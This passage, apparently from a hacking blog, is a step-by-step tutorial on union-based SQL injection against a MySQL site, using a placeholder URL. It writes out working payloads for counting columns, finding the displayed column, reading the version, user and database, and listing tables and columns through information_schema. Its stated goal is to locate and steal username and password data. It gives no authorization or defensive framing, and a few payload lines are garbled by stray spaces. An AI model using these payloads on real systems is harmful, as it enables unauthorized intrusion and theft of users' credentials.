Sub-section 2 :
Find the number of columns
So, now its time to find the number of columns present. For this purpose, we will be using 'order by' until we get error.
That is, we make our URL query as:
www.site.com/article.php?id=5 order by 1/*
//this didn't give error.
Now, I do increase it to 2.
www.site.com/article.php?id=5 order by 2/*
//still no error
So, we need to increase until we get the error.
In my example, I got error when I put the value 3 i.e.
www.site.com/article.php?id=5 order by 3/*
//this gave me error.
So, it means there are 2 columns in the current table (3- 1 =2). This is how we find the number of columns.
Sub-section 3 :
Addressing Vulnerable Part:
Now, we need to use union statement & find the column which we can replace so as to see the secret data on the page.
First lets craft the union statement which won't error.. This becomes like this:
www.site.com/article.php?id=5 UNION ALL SELECT null/*
This would error because our query needs to have one more null there.. Also null doesn't cause any type conversion error as it is just null..
So for our injection, it becomes:
www.site.com/article.php?id=5 UNION ALL SELECT null,null/*
For this we do:
www.site.com/article.php?id=5 UNION ALL SELECT 1 ,2/*
Now we will see the number(s) on the page somewhere. I mean, either 1 or 2 or both 1 & 2 are seen on the page. Note that the number may be displayed anywhere like in the title of the page or sometime even in the hidden tags in the source.. So, this means we can replace the number with our commands to display the private data the DB holds.
In my example, 1 is seen on the page. This means, I should replace 1 with my things to proceed further. Got it?? So lets move forward.
Quick note: Sometime the numbers may not be displayed so it becomes hard for you to find the column which you can use to steal the data.. So in that case, you may try something like below:
www.site.com/article.php?id=5 UNION ALL SELECT xyz123,null/*
or
www.site.com/article.php?id=5 UNION ALL SELECT null,xyz123/*
If xyz123 is displayed somewhere in the page, you may go further for injection replacing the text part... Here, I have kept text instead of integer to check if text is displayed... Also, be sure to check source because sometimes they may be in some hidden tags..
CTD...
Sub-section 4 :
Finding MySQL version:
For our injection, it is necessary to find the MySQL version bcoz if it is 5, our job becomes lot easier. To check the version, there is a function @@version or version().
So, what we do is replace 1(which is the replaceable part) with @@version i.e. we do as below:
www.site.com/article.php?id=5 UNION ALL SELECT @@version,2/*
or
www.site.com/article.php?id=5 UNION ALL SELECT version (),2/*
So, this would return the version of MySQL running on the server.
But, sometimes u may get error with above query. If that is the case, do use of unhex(hex()) function like this:
www.site.com/article.php?id=UN ION ALL SELECT unhex(hex (@@version)),2/*
Remember that if u have to use unhex(hex()) function here, u will also have to use this function in the injection process later on.
@@version will give u the version. It may be either 4 (or below) or 5 & above. I m now going to discuss the injection process for version 5 and 4 separately coz as I said earlier, version 5 makes it easy for us to perform the injection.
Quick note: Also, you may check for user, database,etc.. by using following:
www.site.com/article.php?id=5 UNION ALL SELECT user (),2/*
http://www.site.com/article.ph p?id=5 UNION ALL SELECT database(),2/*
Sub-section 5 :
MySQL 5 or above injection:
Here, I m gonna show u how to access data in the server running MySQL 5 or above.
U got MySQL version 5.0.27 standard using the @@version in url parameter. MySQL from version 5 has a useful function called information_schema. This is table that holds information about the tables and columns present in the DB server. That is, it contains name of all tables and columns of the site.
For getting table list, we use: table_name from information_schema.tables
For getting column list, we use: column_name from information_schema.columns
So our query for getting the table list in our example would be:
www.site.com/article.php?id=5 UNION ALL SELECT table_name,2 FROM information_schema.tables/*
And yeah if u had to use unhex(hex()) while finding version, u will have to do:
www.site.com/article.php?id=5 UNION ALL SELECT unhex (hex(table_name)),2 FROM information_schema.tables/*
This will list all the tables present in the DB. For our purpose, we will be searching for the table containing the user and password information. So we look the probable table with that information. U can even write down the table names for further reference and works. For my example, I would use the tbluser as the table that contains user & password.
Similarly, to get the column list, we would make our query as:
www.site.com/article.php?id=5 UNION ALL SELECT column_name,2 FROM information_schema.columns/*
This returns all the columns present in the DB server. Now from this listing, we will look for the probable columns for username and password. For my injection, there are two columns holding these info. They are username and password respectively. Succeed in above and then comment here to get more info
No comments:
Post a Comment